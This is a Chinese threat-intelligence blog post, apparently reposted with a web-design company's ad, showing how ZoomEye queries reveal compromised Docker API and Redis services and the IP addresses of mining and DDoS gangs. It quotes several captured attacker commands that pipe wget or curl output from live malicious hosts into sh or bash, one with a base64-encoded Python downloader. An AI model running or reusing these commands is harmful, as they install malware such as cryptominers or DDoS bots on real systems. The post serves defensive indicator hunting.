這篇文章給大家介紹ZoomEye中怎么獲取IOC，內(nèi)容非常詳細(xì)，感興趣的小伙伴們可以參考借鑒，希望對(duì)大家能有所幫助。

創(chuàng)新互聯(lián)建站網(wǎng)站建設(shè)公司是一家服務(wù)多年做網(wǎng)站建設(shè)策劃設(shè)計(jì)制作的公司,為廣大用戶提供了成都網(wǎng)站設(shè)計(jì)、成都網(wǎng)站制作，成都網(wǎng)站設(shè)計(jì)，廣告投放平臺(tái)，成都做網(wǎng)站選創(chuàng)新互聯(lián)建站，貼合企業(yè)需求，高性價(jià)比，滿足客戶不同層次的需求一站式服務(wù)歡迎致電。

最近日常使用ZoomEye搜索一些惡意IOC IP信息時(shí)，發(fā)現(xiàn)一個(gè)現(xiàn)在還在活躍的惡意IP：194.38.20.199 直接在ZoomEye里查詢：194.38.20.199 -ip:194.38.20.199解釋下：前面那IP當(dāng)字符串全局匹配，后面的-ip:194.38.20.199的目的是排除掉本身這個(gè)IP開(kāi)的端口服務(wù)的一些信息，結(jié)果如下圖：得到129條結(jié)果，其中主要是redis及docker服務(wù)：這些都是這個(gè)團(tuán)伙作案遺留下來(lái)的痕跡被ZoomEye捕獲，從redis記錄可以看出來(lái)是通過(guò)設(shè)置 master_host 的方式進(jìn)行攻擊的（參考 https://paper.seebug.org/975/ ），而docker服務(wù)通過(guò)docker api獲取容器信息來(lái)看是設(shè)置了鏡像Command命令實(shí)現(xiàn)命令執(zhí)行：

/bin/bash -c 'apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 194.38.20.199/d.sh | sh;tail -f /dev/null'"

訪問(wèn)確定目前這個(gè)IP幾服務(wù)還是存活狀態(tài)！很多事情僵尸網(wǎng)絡(luò)等的自動(dòng)化攻擊都會(huì)遺留下很多的攻擊痕跡，而這些痕跡可以被網(wǎng)絡(luò)空間搜索引擎探測(cè)捕捉到，比如 https://paper.seebug.org/595/ 再比如  前不久360netlab抓到的一個(gè)新的Matryosh僵尸網(wǎng)絡(luò)通過(guò)攻擊adb服務(wù)進(jìn)行傳播，國(guó)外的研究者就發(fā)現(xiàn)通過(guò)ZoomEye可以捕捉到有意思信息 https://twitter.com/r3dbU7z/status/1356802656493264896我們回到這個(gè)主題案例，在這些被入侵的docker api服務(wù)里我們可以通過(guò)ZoomEye搜索 wget 或 curl 或 apt-get這些痕跡來(lái)確定被入侵目標(biāo)及其他黑客團(tuán)伙或IOC信息，我們以wget為例子 搜索語(yǔ)法如下：

"Server: Docker" +"Content-Type: application/json" +wget

到目前搜索到71 條結(jié)果（注意這個(gè)結(jié)果可能隨時(shí)變化這個(gè)是因?yàn)閆oomEye采用覆蓋更新的方式，比如被入侵后恢復(fù)正常服務(wù)就會(huì)被替換）搜索其他團(tuán)伙或者IOC語(yǔ)法如下：

"Server: Docker" +"Content-Type: application/json" +wget -194.38.20.199

排除包含有194.38.20.199的目標(biāo)，得到19條結(jié)果。隨便找一個(gè)：

"Command":"sh -c 'wget -qO - http://34.66.229.152:80/wp-content/themes/twentyseventeen/d | sh; tail -f /dev/null'"

找到一個(gè)新的34.66.229.152[目前也處于存活狀態(tài)] 開(kāi)源威脅情報(bào)顯示這個(gè)是Tsunami的DDOS團(tuán)伙，我們繼續(xù)語(yǔ)法：

"Server: Docker" +"Content-Type: application/json" +wget -194.38.20.199 -34.66.229.152

得到2條目標(biāo)，看下banner里的Command信息得到2個(gè)惡意IP 45.137.155.55[目前也處于存活狀態(tài)] 及 209.141.40.190[目前也處于存活狀態(tài)]

"Command":"/bin/bash -c 'apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 45.137.155.55/d.sh | sh;tail -f /dev/null'"

從這個(gè)命令格式及d.sh的來(lái)看跟 194.38.20.199的很類似，姑且可以歸于Kinsing。

"Command":"chroot /mnt /bin/sh -c 'curl -s http://209.141.40.190/xms | bash -sh; wget -q -O - http://209.141.40.190/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://209.141.40.190/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms'"

看起來(lái)又是一個(gè)挖礦相關(guān)的，所以到目前為止我們通過(guò)在Docker API信息里搜索wget最終找到了如下幾個(gè)惡意IOC：194.38.20.199/45.137.155.55 Kinsing/挖礦34.66.229.152  Tsunami/DDOS209.141.40.190 未知/挖礦當(dāng)然你還可以通過(guò)分析哪些sh腳本提取跟多的IOC IP地址進(jìn)行關(guān)聯(lián)，這里與主題關(guān)系不大就不繼續(xù)了。

關(guān)于ZoomEye中怎么獲取IOC就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò)，可以把它分享出去讓更多的人看到。